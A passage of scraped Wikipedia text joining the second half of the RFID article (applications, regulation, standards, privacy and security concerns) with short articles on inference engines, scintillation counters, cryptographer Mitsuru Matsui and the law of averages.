Since RFID tags can be read through an item, there is no need to open a book cover or DVD case to scan an item, and a stack of books can be read simultaneously. Book tags can be read while books are in motion on aconveyor belt, which reduces staff time. This can all be done by the borrowers themselves, reducing the need for library staff assistance. With portable readers, inventories could be done on a whole shelf of materials within seconds.[98]However, as of 2008, this technology remained too costly for many smaller libraries, and the conversion period has been estimated at 11 months for an average-size library. A 2004 Dutch estimate was that a library which lends 100,000 books per year should plan on a cost of €50,000 (borrow- and return-stations: 12,500 each, detection porches 10,000 each; tags 0.36 each). RFID taking a large burden off staff could also mean that fewer staff will be needed, resulting in some of them getting laid off,[97]but that has so far not happened in North America where recent surveys have not returned a single library that cut staff because of adding RFID.[citation needed][99]In fact, library budgets are being reduced for personnel and increased for infrastructure, making it necessary for libraries to add automation to compensate for the reduced staff size.[citation needed][99]Also, the tasks that RFID takes over are largely not the primary tasks of librarians.[citation needed][99]A finding in the Netherlands is that borrowers are pleased with the fact that staff are now more available for answering questions.[citation needed][99]
Privacy concerns have been raised surrounding library use of RFID.[100][101]Because some RFID tags can be read up to 100 metres (330 ft) away, there is some concern over whether sensitive information could be collected from an unwilling source. However, library RFID tags do not contain any patron information,[102]and the tags used in the majority of libraries use a frequency only readable from approximately 10 feet (3.0 m).[96]Another concern is that a non-library agency could potentially record the RFID tags of every person leaving the library without the library administrator's knowledge or consent. One simple option is to let the book transmit a code that has meaning only in conjunction with the library's database. Another possible enhancement would be to give each book a new code every time it is returned. In future, should readers become ubiquitous (and possibly networked), then stolen books could be traced even outside the library. Tag removal could be made difficult if the tags are so small that they fit invisibly inside a (random) page, possibly put there by the publisher.[citation needed]
RFID technologies are now[when?]also implemented in end-user applications in museums.[103]An example was the custom-designed temporary research application, "eXspot", at theExploratorium, a science museum inSan Francisco,California. A visitor entering the museum received an RF tag that could be carried as a card. The eXspot system enabled the visitor to receive information about specific exhibits. Aside from the exhibit information, the visitor could take photographs of themselves at the exhibit. It was also intended to allow the visitor to take data for later analysis. The collected information could be retrieved at home from a "personalized" website keyed to the RFID tag.[104]
In 2004, school authorities in the Japanese city ofOsakamade a decision to start chipping children's clothing, backpacks, and student IDs in a primary school.[105]Later, in 2007, a school inDoncaster, England, piloted a monitoring system designed to keep tabs on pupils by tracking radio chips in their uniforms.[106][when?]St Charles Sixth Form Collegein westLondon, England, starting in 2008, uses an RFID card system to check in and out of the main gate, to both track attendance and prevent unauthorized entrance. Similarly,Whitcliffe Mount SchoolinCleckheaton, England, uses RFID to track pupils and staff in and out of the building via a specially designed card. In the Philippines, during 2012, some schools already[when?]use RFID in IDs for borrowing books.[107][unreliable source?]Gates in those particular schools also have RFID scanners for buying items at school shops and canteens. RFID is also used in school libraries, and to sign in and out for student and teacher attendance.[99]
RFID for timing racesbegan in the early 1990s with pigeon racing, introduced by the companyDeister Electronicsin Germany. RFID can provide race start and end timings for individuals in large races where it is impossible to get accurate stopwatch readings for every entrant.[citation needed]
In races using RFID, racers wear tags that are read by antennas placed alongside the track or on mats across the track. UHF tags provide accurate readings with specially designed antennas. Rush error,[clarification needed]lap count errors and accidents at race start are avoided, as anyone can start and finish at any time without being in a batch mode.[clarification needed]
The design of the chip and of the antenna controls the range from which it can be read. Short range compact chips are twist tied to the shoe, or strapped to the ankle withhook-and-loop fasteners. The chips must be about 400 mm from the mat, therefore giving very good temporal resolution. Alternatively, a chip plus a very large (125mm square) antenna can be incorporated into the bib number worn on the athlete's chest at a height of about 1.25 m (4.1 ft).[citation needed]
Passive and active RFID systems are used in off-road events such asOrienteering,Enduroand Hare and Hounds racing. Riders have a transponder on their person, normally on their arm. When they complete a lap they swipe or touch the receiver which is connected to a computer and log their lap time.[citation needed]
RFID is being[when?]adapted by many recruitment agencies which have a PET (physical endurance test) as their qualifying procedure, especially in cases where the candidate volumes may run into millions (Indian Railway recruitment cells, police and power sector).
A number ofski resortshave adopted RFID tags to provide skiers hands-free access toski lifts. Skiers do not have to take their passes out of their pockets. Ski jackets have a left pocket into which the chip+card fits. This nearly contacts the sensor unit on the left of the turnstile as the skier pushes through to the lift. These systems were based on high frequency (HF) at 13.56MHz. The bulk of ski areas in Europe, from Verbier to Chamonix, use these systems.[108][109][110]
TheNFLin the United States equips players with RFID chips that measures speed, distance and direction traveled by each player in real-time. Currently, cameras stay focused on thequarterback; however, numerous plays are happening simultaneously on the field. The RFID chip will provide new insight into these simultaneous plays.[111]The chip triangulates the player's position within six inches and will be used to digitallybroadcastreplays. The RFID chip will make individual player information accessible to the public. The data will be available via the NFL 2015 app.[112]The RFID chips are manufactured byZebra Technologies. Zebra Technologies tested the RFID chip in 18 stadiums last year[when?]to track vector data.[113]
RFID tags are often a complement, but not a substitute, forUniversal Product Code(UPC) orEuropean Article Number(EAN) barcodes. They may never completely replace barcodes, due in part to their higher cost and the advantage of multiple data sources on the same object. Also, unlike RFID labels, barcodes can be generated and distributed electronically by e-mail or mobile phone, for printing or display by the recipient. An example is airlineboarding passes. The newEPC, along with several other schemes, is widely available at reasonable cost.
The storage of data associated with tracking items will require manyterabytes. Filtering and categorizing RFID data is needed to create useful information. It is likely that goods will be tracked by the pallet using RFID tags, and at package level with UPC or EAN from unique barcodes.
The unique identity is a mandatory requirement for RFID tags, despite special choice of the numbering scheme. RFID tag data capacity is large enough that each individual tag will have a unique code, while current barcodes are limited to a single type code for a particular product. The uniqueness of RFID tags means that a product may be tracked as it moves from location to location while being delivered to a person. This may help to combat theft and other forms of product loss. The tracing of products is an important feature that is well supported with RFID tags containing a unique identity of the tag and the serial number of the object. This may help companies cope with quality deficiencies and resulting recall campaigns, but also contributes to concern about tracking and profiling of persons after the sale.
Since around 2007, there has been increasing development in the use of RFID[when?]in thewaste managementindustry. RFID tags are installed on waste collection carts, linking carts to the owner's account for easy billing and service verification.[114]The tag is embedded into a garbage and recycle container, and the RFID reader is affixed to the garbage and recycle trucks.[115]RFID also measures a customer's set-out rate and provides insight as to the number of carts serviced by each waste collection vehicle. This RFID process replaces traditional "pay as you throw" (PAYT)municipal solid wasteusage-pricing models.
Active RFID tags have the potential to function as low-cost remote sensors that broadcasttelemetryback to a base station. Applications of tagometry data could include sensing of road conditions by implantedbeacons, weather reports, and noise level monitoring.[116]
Passive RFID tags can also report sensor data. For example, theWireless Identification and Sensing Platformis a passive tag that reports temperature, acceleration and capacitance to commercial Gen2 RFID readers.
It is possible that active or battery-assisted passive (BAP) RFID tags could broadcast a signal to an in-store receiver to determine whether the RFID tag – and by extension, the product it is attached to – is in the store.[citation needed]
To avoid injuries to humans and animals, RF transmission needs to be controlled.[117]A number of organizations have set standards for RFID, including theInternational Organization for Standardization(ISO), theInternational Electrotechnical Commission(IEC),ASTM International, theDASH7Alliance andEPCglobal.[118]
Several specific industries have also set guidelines, including the Financial Services Technology Consortium (FSTC) for tracking IT Assets with RFID, the Computer Technology Industry AssociationCompTIAfor certifying RFID engineers, and theInternational Air Transport Association(IATA) for luggage in airports.[citation needed]
Every country can set its own rules forfrequency allocationfor RFID tags, and not all radio bands are available in all countries. These frequencies are known as theISM bands(Industrial Scientific and Medical bands). The return signal of the tag may still causeinterferencefor other radio users.[citation needed]
In North America, UHF can be used unlicensed for 902–928 MHz (±13 MHz from the 915 MHz center frequency), but restrictions exist for transmission power.[citation needed]In Europe, RFID and other low-power radio applications are regulated byETSIrecommendationsEN 300 220andEN 302 208, andEROrecommendation 70 03, allowing RFID operation with somewhat complex band restrictions from 865–868 MHz.[citation needed]Readers are required to monitor a channel before transmitting ("Listen Before Talk"); this requirement has led to some restrictions on performance, the resolution of which is a subject of current[when?]research. The North American UHF standard is not accepted in France as it interferes with its military bands.[citation needed]On July 25, 2012, Japan changed its UHF band to 920 MHz, more closely matching the United States' 915 MHz band, establishing an international standard environment for RFID.[citation needed]
In some countries, a site license is needed, which needs to be applied for at the local authorities, and can be revoked.[citation needed]
As of 31 October 2014, regulations are in place in 78 countries representing approximately 96.5% of the world's GDP, and work on regulations was in progress in three countries representing approximately 1% of the world's GDP.[119]
Standardsthat have been made regarding RFID include:
In order to ensure global interoperability of products, several organizations have set up additional standards forRFID testing. These standards include conformance, performance and interoperability tests.[citation needed]
EPC Gen2 is short forEPCglobal UHF Class 1 Generation 2.
EPCglobal, a joint venture betweenGS1and GS1 US, is working on international standards for the use of mostly passive RFID and theElectronic Product Code(EPC) in the identification of many items in thesupply chainfor companies worldwide.
One of the missions of EPCglobal was to simplify the Babel of protocols prevalent in the RFID world in the 1990s. Two tag air interfaces (the protocol for exchanging information between a tag and a reader) were defined (but not ratified) by EPCglobal prior to 2003. These protocols, commonly known as Class 0 and Class 1, saw significant commercial implementation in 2002–2005.[121]
In 2004, the Hardware Action Group created a new protocol, the Class 1 Generation 2 interface, which addressed a number of problems that had been experienced with Class 0 and Class 1 tags. The EPC Gen2 standard was approved in December 2004. This was approved after a contention fromIntermecthat the standard may infringe a number of their RFID-related patents. It was decided that the standard itself does not infringe their patents, making the standard royalty free.[122]The EPC Gen2 standard was adopted with minor modifications as ISO 18000-6C in 2006.[123]
In 2007, the lowest cost of Gen2 EPC inlay was offered by the now-defunct company SmartCode, at a price of $0.05 apiece in volumes of 100 million or more.[124]
Not every successful reading of a tag (an observation) is useful for business purposes. A large amount of data may be generated that is not useful for managing inventory or other applications. For example, a customer moving a product from one shelf to another, or a pallet load of articles that passes several readers while being moved in a warehouse, are events that do not produce data that are meaningful to an inventory control system.[125]
Event filtering is required to reduce this data inflow to a meaningful depiction of moving goods passing a threshold. Various concepts[example needed]have been designed, mainly offered asmiddlewareperforming the filtering from noisy and redundant raw data to significant processed data.[citation needed]
The frequencies used for UHF RFID in the USA are as of 2007 incompatible with those of Europe or Japan. Furthermore, no emerging standard has yet become as universal as thebarcode.[126]To address international trade concerns, it is necessary to use a tag that is operational within all of the international frequency domains.
A primary RFID security concern is the illicit tracking of RFID tags. Tags, which are world-readable, pose a risk to both personal location privacy and corporate/military security. Such concerns have been raised with respect to theUnited States Department of Defense's recent[when?]adoption of RFID tags forsupply chain management.[127]More generally, privacy organizations have expressed concerns in the context of ongoing efforts to embed electronic product code (EPC) RFID tags in general-use products. This is mostly as a result of the fact that RFID tags can be read, and legitimate transactions with readers can be eavesdropped on, from non-trivial distances. RFID used in access control,[128]payment and eID (e-passport) systems operate at a shorter range than EPC RFID systems but are also vulnerable toskimmingand eavesdropping, albeit at shorter distances.[129]
A second method of prevention is by using cryptography.Rolling codesandchallenge–response authentication(CRA) are commonly used to foil monitor-repetition of the messages between the tag and reader, as any messages that have been recorded would prove to be unsuccessful on repeat transmission.[clarification needed]Rolling codes rely upon the tag's ID being changed after each interrogation, while CRA uses software to ask for acryptographicallycoded response from the tag. The protocols used during CRA can besymmetric, or may usepublic key cryptography.[130]
While a variety of secure protocols have been suggested for RFID tags,
in order to support long read range at low cost, many RFID tags have barely enough power available
to support very low-power and therefore simple security protocols such ascover-coding.[131]
Unauthorized reading of RFID tags presents a risk to privacy and to business secrecy.[132]Unauthorized readers can potentially use RFID information to identify or track packages, persons, carriers, or the contents of a package.[130]Several prototype systems are being developed to combat unauthorized reading, including RFID signal interruption,[133]as well as the possibility of legislation, and 700 scientific papers have been published on this matter since 2002.[134]There are also concerns that the database structure ofObject Naming Servicemay be susceptible to infiltration, similar todenial-of-service attacks, after the EPCglobal Network ONS root servers were shown to be vulnerable.[135]
Microchip–induced tumours have been noted during animal trials.[136][137]
In an effort to prevent the passive "skimming" of RFID-enabled cards or passports, the U.S.General Services Administration(GSA) issued a set of test procedures for evaluating electromagnetically opaque sleeves.[138]For shielding products to be in compliance with FIPS-201 guidelines, they must meet or exceed this published standard; compliant products are listed on the website of the U.S. CIO's FIPS-201 Evaluation Program.[139]The United States government requires that when new ID cards are issued, they must be delivered with an approved shielding sleeve or holder.[140]Although many wallets and passport holders are advertised to protect personal information, there is little evidence that RFID skimming is a serious threat; data encryption and use ofEMVchips rather than RFID makes this sort of theft rare.[141][142]
There are contradictory opinions as to whether aluminum can prevent reading of RFID chips. Some people claim that aluminum shielding, essentially creating aFaraday cage, does work.[143]Others claim that simply wrapping an RFID card in aluminum foil only makes transmission more difficult and is not completely effective at preventing it.[144]
Shielding effectiveness depends on the frequency being used.Low-frequencyLowFID tags, like those used in implantable devices for humans and pets, are relatively resistant to shielding, although thick metal foil will prevent most reads.High frequencyHighFID tags (13.56 MHz—smart cardsand access badges) are sensitive to shielding and are difficult to read when within a few centimetres of a metal surface.UHFUltra-HighFID tags (pallets and cartons) are difficult to read when placed within a few millimetres of a metal surface, although their read range is actually increased when they are spaced 2–4 cm from a metal surface due to positive reinforcement of the reflected wave and the incident wave at the tag.[145]
The use of RFID has engendered considerable controversy and someconsumer privacyadvocates have initiated productboycotts. Consumer privacy expertsKatherine AlbrechtandLiz McIntyreare two prominent critics of the "spychip" technology. The two main privacy concerns regarding RFID are as follows:[citation needed]
Most concerns revolve around the fact that RFID tags affixed to products remain functional even after the products have been purchased and taken home; thus, they may be used forsurveillanceand other purposes unrelated to their supply chain inventory functions.[146]
The RFID Network responded to these fears in the first episode of their syndicated cable TV series, saying that they are unfounded, and let RF engineers demonstrate how RFID works.[147]They provided images of RF engineers driving an RFID-enabled van around a building and trying to take an inventory of items inside. They also discussed satellite tracking of a passive RFID tag.
The concerns raised may be addressed in part by use of theClipped Tag. The Clipped Tag is an RFID tag designed to increase privacy for the purchaser of an item. The Clipped Tag has been suggested byIBMresearchersPaul Moskowitzand Guenter Karjoth. After the point of sale, a person may tear off a portion of the tag. This allows the transformation of a long-range tag into a proximity tag that still may be read, but only at short range – less than a few inches or centimeters. The modification of the tag may be confirmed visually. The tag may still be used later for returns, recalls, or recycling.
However, read range is a function of both the reader and the tag itself. Improvements in technology may increase read ranges for tags. Tags may be read at longer ranges than they are designed for by increasing reader power. The limit on read distance then becomes the signal-to-noise ratio of the signal reflected from the tag back to the reader. Researchers at two security conferences have demonstrated that passive Ultra-HighFID tags normally read at ranges of up to 30 feet can be read at ranges of 50 to 69 feet using suitable equipment.[148][149]
In January 2004, privacy advocates from CASPIAN and the German privacy groupFoeBuDwere invited to the METRO Future Store in Germany, where an RFID pilot project was implemented. It was uncovered by accident that METRO "Payback" customerloyalty cardscontained RFID tags with customer IDs, a fact that was disclosed neither to customers receiving the cards, nor to this group of privacy advocates. This happened despite assurances by METRO that no customer identification data was tracked and all RFID usage was clearly disclosed.[150]
During the UNWorld Summit on the Information Society(WSIS) in November 2005,Richard Stallman, the founder of thefree software movement, protested the use of RFID security cards by covering his card with aluminum foil.[151]
In 2004–2005, theFederal Trade Commissionstaff conducted a workshop and review of RFID privacy concerns and issued a report recommending best practices.[152]
RFID was one of the main topics of the 2006Chaos Communication Congress(organized by theChaos Computer ClubinBerlin) and triggered a large press debate. Topics included electronic passports, Mifare cryptography and the tickets for the FIFA World Cup 2006. Talks showed how the first real-world mass application of RFID at the 2006 FIFA Football World Cup worked. The groupmonochromstaged a "Hack RFID" song.[153]
Some individuals have grown to fear the loss of rights due to RFID human implantation.
By early 2007, Chris Paget of San Francisco, California, showed that RFID information could be pulled from aUS passport cardby using only $250 worth of equipment. This suggests that with the information captured, it would be possible to clone such cards.[154]
According to ZDNet, critics believe that RFID will lead to tracking individuals' every movement and will be an invasion of privacy.[155]In the bookSpyChips: How Major Corporations and Government Plan to Track Your Every Moveby Katherine Albrecht and Liz McIntyre, one is encouraged to "imagine a world of no privacy. Where your every purchase is monitored and recorded in a database and your every belonging is numbered. Where someone many states away or perhaps in another country has a record of everything you have ever bought. What's more, they can be tracked and monitored remotely".[156]
According to an RSA laboratories FAQ, RFID tags can be destroyed by a standard microwave oven;[157]however, some types of RFID tags, particularly those constructed to radiate using large metallic antennas (in particular RF tags andEPCtags), may catch fire if subjected to this process for too long (as would any metallic item inside a microwave oven). This simple method cannot safely be used to deactivate RFID features in electronic devices, or those implanted in living tissue, because of the risk of damage to the "host". However the time required is extremely short (a second or two of radiation) and the method works in many other non-electronic and inanimate items, long before heat or fire become of concern.[158]
Some RFID tags implement a "kill command" mechanism to permanently and irreversibly disable them. This mechanism can be applied if the chip itself is trusted or the mechanism is known by the person that wants to "kill" the tag.
UHF RFID tags that comply with the EPC2 Gen 2 Class 1 standard usually support this mechanism, while protecting the chip from being killed with a password.[159]Guessing or cracking this needed 32-bit password for killing a tag would not be difficult for a determined attacker.[160]
|
https://en.wikipedia.org/wiki/Radio_Frequency_Identification
|
In the field ofartificial intelligence, aninference engineis asoftware componentof an intelligent system that applies logical rules to theknowledge baseto deduce new information. The first inference engines were components ofexpert systems. The typical expert system consisted of a knowledge base and an inference engine. The knowledge base stored facts about the world. The inference engine applied logical rules to the knowledge base and deduced new knowledge. This process would iterate as each new fact in the knowledge base could trigger additional rules in the inference engine. Inference engines work primarily in one of two modes either special rule or facts:forward chainingandbackward chaining. Forward chaining starts with the known facts and asserts new facts. Backward chaining starts with goals, and works backward to determine what facts must be asserted so that the goals can be achieved.[1]
Additionally, the concept of 'inference' has expanded to include the process through which trainedneural networksgenerate predictions or decisions. In this context, an 'inference engine' could refer to the specific part of the system, or even the hardware, that executes these operations. This type of inference plays a crucial role in various applications, including (but not limited to)image recognition,natural language processing, andautonomous vehicles. The inference phase in these applications is typically characterized by a high volume of data inputs and real-time processing requirements.
The logic that an inference engine uses is typically represented as IF-THEN rules. The general format of such rules is IF <logical expression> THEN <logical expression>. Prior to the development of expert systems and inference engines, artificial intelligence researchers focused on more powerfultheorem proverenvironments that offered much fuller implementations offirst-order logic. For example, general statements that includeduniversal quantification(for all X some statement is true) andexistential quantification(there exists some X such that some statement is true). What researchers discovered is that the power of these theorem-proving environments was also their drawback. Back in 1965, it was far too easy to create logical expressions that could take an indeterminate or even infinite time to terminate. For example, it is common in universal quantification to make statements over an infinite set such as the set of all natural numbers. Such statements are perfectly reasonable and even required in mathematical proofs but when included in an automated theorem prover executing on a computer may cause the computer to fall into an infinite loop. Focusing on IF-THEN statements (what logicians callmodus ponens) still gave developers a very powerful general mechanism to represent logic, but one that could be used efficiently with computational resources. What is more, there is some psychological research that indicates humans also tend to favor IF-THEN representations when storing complex knowledge.[2]
A simple example ofmodus ponensoften used in introductory logic books is "If you are human then you are mortal". This can be represented inpseudocodeas:
A trivial example of how this rule would be used in an inference engine is as follows. Inforward chaining, the inference engine would find any facts in the knowledge base that matched Human(x) and for each fact it found would add the new information Mortal(x) to the knowledge base. So if it found an object called Socrates that was human it would deduce that Socrates was mortal. Inbackward chaining, the system would be given a goal, e.g. answer the question is Socrates mortal? It would search through the knowledge base and determine if Socrates was human and, if so, would assert he is also mortal. However, in backward chaining a common technique was to integrate the inference engine with a user interface. In that way, rather than simply being automated the system could now be interactive. In this trivial example, if the system was given the goal to answer the question if Socrates was mortal and it didn't yet know if he was human, it would generate a window to ask the user the question "Is Socrates human?" and would then use that information accordingly.
This innovation of integrating the inference engine with a user interface led to the second early advancement of expert systems: explanation capabilities. The explicit representation of knowledge as rules rather than code made it possible to generate explanations to users: both explanations in real time and after the fact. So if the system asked the user "Is Socrates human?", the user may wonder why she was being asked that question and the system would use the chain of rules to explain why it was currently trying to ascertain that bit of knowledge: that is, it needs to determine if Socrates is mortal and to do that needs to determine if he is human. At first these explanations were not much different than the standard debugging information that developers deal with when debugging any system. However, an active area of research was utilizing natural language technology to ask, understand, and generate questions and explanations using natural languages rather than computer formalisms.[3]
An inference engine cycles through three sequential steps:match rules,select rules, andexecute rules. The execution of the rules will often result in new facts or goals being added to the knowledge base, which will trigger the cycle to repeat. This cycle continues until no new rules can be matched.
In the first step,match rules, the inference engine finds all of the rules that are triggered by the current contents of the knowledge base. In forward chaining, the engine looks for rules where the antecedent (left hand side) matches some fact in the knowledge base. In backward chaining, the engine looks for antecedents that can satisfy one of the current goals.
In the second step,select rules, the inference engine prioritizes the various rules that were matched to determine the order to execute them. In the final step,execute rules, the engine executes each matched rule in the order determined in step two and then iterates back to step one again. The cycle continues until no new rules are matched.[4]
Early inference engines focused primarily on forward chaining. These systems were usually implemented in theLispprogramming language. Lisp was a frequent platform for early AI research due to its strong capability to do symbolic manipulation. Also, as aninterpreted languageit offered productive development environments appropriate todebuggingcomplex programs. A necessary consequence of these benefits was that Lisp programs tended to be slower and less robust than compiled languages of the time such asC. A common approach in these early days was to take an expert system application and repackage the inference engine used for that system as a re-usable tool other researchers could use for the development of other expert systems. For example,MYCINwas an early expert system for medical diagnosis and EMYCIN was an inference engine extrapolated from MYCIN and made available for other researchers.[1]
As expert systems moved from research prototypes to deployed systems there was more focus on issues such as speed and robustness. One of the first and most popular forward chaining engines wasOPS5, which used theRete algorithmto optimize the efficiency of rule firing. Another very popular technology that was developed was theProloglogic programming language. Prolog focused primarily on backward chaining and also featured various commercial versions and optimizations for efficiency and robustness.[5]
As expert systems prompted significant interest from the business world, various companies, many of them started or guided by prominent AI researchers created productized versions of inference engines. For example,Intellicorpwas initially guided byEdward Feigenbaum. These inference engine products were also often developed in Lisp at first. However, demands for more affordable and commercially viable platforms eventually madepersonal computerplatforms very popular.
ClipsRulesandRefPerSys(inspired byCAIA[6]and the work ofJacques Pitrat). TheFrama-Cstatic source code analyzer also uses some inference engine techniques.
|
https://en.wikipedia.org/wiki/Inference_engine
|
Ascintillation counteris an instrument for detecting and measuringionizing radiationby using theexcitationeffect of incident radiation on ascintillatingmaterial, and detecting the resultant light pulses.
It consists of ascintillatorwhich generates photons in response to incident radiation, a sensitivephotodetector(usually aphotomultipliertube (PMT), acharge-coupled device(CCD) camera, or aphotodiode), which converts the light to an electrical signal and electronics to process this signal.
Scintillation counters are widely used in radiation protection, assay of radioactive materials and physics research because they can be made inexpensively yet with goodquantum efficiency, and can measure both the intensity and theenergyof incident radiation.
The first electronic scintillation counter was invented in 1944 bySir Samuel Curran[1][2]whilst he was working on theManhattan Projectat theUniversity of California at Berkeley. There was a requirement to measure the radiation from small quantities of uranium, and his innovation was to use one of the newly available highly sensitivephotomultipliertubes made by theRadio Corporation of Americato accurately count the flashes of light from a scintillator subjected to radiation.
This built upon the work of earlier researchers such asAntoine Henri Becquerel, who discoveredradioactivitywhilst working on thephosphorescenceof uranium salts in 1896. Previously, scintillation events had to be laboriously detected by eye, using aspinthariscope(a simple microscope) to observe light flashes in the scintillator. The first commercial liquid scintillation counter was made by Lyle E. Packard and sold to Argonne Cancer Research Hospital at the University of Chicago in 1953. The production model was designed especially fortritiumandcarbon-14which were used in metabolic studiesin vivoandin vitro.[3]
When an ionizing particle passes into the scintillator material, atoms are excited along a track. For charged particles the track is the path of the particle itself. For gamma rays (uncharged), their energy is converted to an energetic electron via either thephotoelectric effect,Compton scatteringorpair production.
The chemistry of atomic de-excitation in the scintillator produces a multitude of low-energy photons, typically near the blue end of the visible spectrum. The quantity is proportional to the energy deposited by the ionizing particle. These can be directed to the photocathode of a photomultiplier tube which emits at most one electron for each arriving photon due to thephotoelectric effect. This group of primary electrons is electrostatically accelerated and focused by an electrical potential so that they strike the first dynode of the tube. The impact of a single electron on the dynode releases a number of secondary electrons which are in turn accelerated to strike the second dynode. Each subsequent dynode impact releases further electrons, and so there is a current amplifying effect at each dynode stage. Each stage is at a higher potential than the previous to provide the accelerating field.
The resultant output signal at the anode is a measurable pulse for each group of photons from an original ionizing event in the scintillator that arrived at the photocathode and carries information about the energy of the original incident radiation. When it is fed to acharge amplifierwhich integrates the energy information, an output pulse is obtained which is proportional to the energy of the particle exciting the scintillator.
The number of such pulses per unit time also gives information about the intensity of the radiation. In some applications individual pulses are not counted, but rather only the average current at the anode is used as a measure of radiation intensity.
The scintillator must be shielded from all ambient light so that external photons do not swamp the ionization events caused by incident radiation. To achieve this a thin opaque foil, such as aluminized mylar, is often used, though it must have a low enough mass to minimize undue attenuation of the incident radiation being measured.
The article on thephotomultipliertube carries a detailed description of the tube's operation.
The scintillator consists of a transparentcrystal, usually a phosphor, plastic (usually containinganthracene) ororganic liquid(seeliquid scintillation counting) that fluoresces when struck byionizing radiation.
Cesium iodide(CsI) in crystalline form is used as the scintillator for the detection of protons and alpha particles.Sodium iodide(NaI) containing a small amount ofthalliumis used as a scintillator for the detection of gamma waves andzinc sulfide(ZnS) is widely used as a detector of alpha particles.Zinc sulfideis the materialRutherfordused to perform his scattering experiment.Lithium iodide(LiI) is used in neutron detectors.
The quantum efficiency of agamma-raydetector (per unit volume) depends upon thedensityofelectronsin the detector, and certain scintillating materials, such assodium iodideandbismuth germanate, achieve high electron densities as a result of the highatomic numbersof some of the elements of which they are composed. However,detectors based on semiconductors, notably hyperpuregermanium, have better intrinsic energy resolution than scintillators, and are preferred where feasible forgamma-ray spectrometry.
In the case ofneutrondetectors, high efficiency is gained through the use of scintillating materials rich inhydrogenthatscatterneutrons efficiently.Liquid scintillation countersare an efficient and practical means of quantifyingbeta radiation.
Scintillation counters are used to measure radiation in a variety of applications including hand heldradiation survey meters, personnel andenvironmental monitoringforradioactive contamination, medical imaging, radiometric assay, nuclear security and nuclear plant safety.
Several products have been introduced in the market utilising scintillation counters for detection of potentially dangerous gamma-emitting materials during transport. These include scintillation counters designed for freight terminals, border security, ports, weigh bridge applications, scrap metal yards and contamination monitoring of nuclear waste. There are variants of scintillation counters mounted on pick-up trucks and helicopters for rapid response in case of a security situation due todirty bombsorradioactive waste.[4][failed verification][5][failed verification]Hand-held units are also commonly used.[6]
In theUnited Kingdom, theHealth and Safety Executive, or HSE, has issued a user guidance note on selecting the correct radiation measurement instrument for the application concerned. This covers all radiation instrument technologies, and is a useful comparative guide to the use of scintillation detectors.[7]
Radioactive contaminationmonitors, for area or personal surveys require a large detection area to ensure efficient and rapid coverage of monitored surfaces. For this a thin scintillator with a large area window and an integrated photomultiplier tube is ideally suited. They find wide application in the field of radioactive contamination monitoring of personnel and the environment. Detectors are designed to have one or two scintillation materials, depending on the application. "Single phosphor" detectors are used for either alpha or beta, and "Dual phosphor" detectors are used to detect both.[8]
A scintillator such as zinc sulphide is used for alpha particle detection, whilst plastic scintillators are used for beta detection. The resultant scintillation energies can be discriminated so that alpha and beta counts can be measured separately with the same detector,[8]This technique is used in both hand-held and fixed monitoring equipment, and such instruments are relatively inexpensive compared with the gas proportional detector.
Scintillation materials are used for ambient gamma dose measurement, though a different construction is used to detect contamination, as no thin window is required.
Scintillators often convert a singlephotonof high energyradiationinto a high number of lower-energy photons, where the number of photons permegaelectronvoltof input energy is fairly constant. By measuring the intensity of the flash (the number of the photons produced by thex-rayor gamma photon) it is therefore possible to discern the original photon's energy.
The spectrometer consists of a suitablescintillatorcrystal, aphotomultipliertube, and a circuit for measuring the height of the pulses produced by the photomultiplier. The pulses are counted and sorted by their height, producing a x-y plot of scintillator flashbrightnessvs number of the flashes, which approximates the energy spectrum of the incident radiation, with some additional artifacts. A monochromatic gamma radiation produces a photopeak at its energy. The detector also shows response at the lower energies, caused byCompton scattering, two smaller escape peaks at energies 0.511 and 1.022 MeV below the photopeak for the creation of electron-positron pairs when one or both annihilation photons escape, and abackscatterpeak. Higher energies can be measured when two or more photons strike the detector almost simultaneously (pile-up, within the time resolution of thedata acquisitionchain), appearing as sum peaks with energies up to the value of two or more photopeaks added[8]
|
https://en.wikipedia.org/wiki/Scintillation_counter
|
Mitsuru Matsui(松井 充,Matsui Mitsuru, born September 16, 1961)is a Japanesecryptographerand senior researcher forMitsubishi ElectricCompany.
While researching error-correcting codes in 1990, Matsui was inspired byEli BihamandAdi Shamir'sdifferential cryptanalysis, and discovered the technique oflinear cryptanalysis, published in 1993. Differential and linear cryptanalysis are the two major general techniques known for thecryptanalysisofblock ciphers.
The following year, Matsui was the first to publicly report an experimental cryptanalysis ofDES, using the computing power of twelveworkstationsover a period of fifty days.
He is also the author of theMISTY-1andMISTY-2block ciphers, and contributed to the design ofCamelliaandKASUMI.
For his achievements, Matsui got the 2012RSA Conference Award for Excellence in Mathematics.
This article about a cryptographer is astub. You can help Wikipedia byexpanding it.
|
https://en.wikipedia.org/wiki/Mitsuru_Matsui
|
Thelaw of averagesis the commonly held belief that a particularoutcomeoreventwill, over certain periods of time, occur at afrequencythat is similar to itsprobability.[1][2]Depending on context or application it can be considered a valid common-sense observation or a misunderstanding of probability. This notion can lead to thegambler's fallacywhen one becomes convinced that a particular outcome must come soon simply because it has not occurred recently (e.g. believing that because three consecutive coin flips yieldedheads, the next coin flip must be virtually guaranteed to betails).
As invoked in everyday life, the "law" usually reflectswishful thinkingor a poor understanding ofstatisticsrather than any mathematical principle. While there is a realtheoremthat a random variable will reflect its underlying probability over a very large sample, the law of averages typically assumes that an unnatural short-term "balance" must occur.[3]Typical applications also generally assume nobiasin the underlying probability distribution, which is frequently at odds with theempirical evidence.[4]
Thegambler's fallacyis a particular misapplication of the law of averages in which the gambler believes that a particular outcome is more likely because it has not happened recently, or (conversely) that because a particular outcome has recently occurred, it will be less likely in the immediate future.[5]
As an example, consider aroulettewheel that has landed on red in three consecutive spins. An onlooker might apply the law of averages to conclude that on its next spin it is guaranteed (or at least is much more likely) to land on black. Of course, the wheel has no memory and its probabilities do not change according to past results. So even if the wheel has landed on red in ten or a hundred consecutive spins, the probability that the next spin will be black is still no more than 48.6% (assuming afairEuropean wheel with only one green zero; it would be exactly 50% if there were no green zero and the wheel were fair, and 47.4% for a fair American wheel with one green "0" and one green "00"). Similarly, there is no statistical basis for the belief that lottery numbers which haven't appeared recently are due to appear soon. (There is some value in choosing lottery numbers that are, in general, lesspopularthan others — not because they are any more or less likely to come up, but because the largest prizes are usually shared among all of the people who chose the winning numbers. The unpopular numbers are just as likely to come up as the popular numbers are, and in the event of a big win, one would likely have to share it with fewer other people. Seeparimutuel betting.)
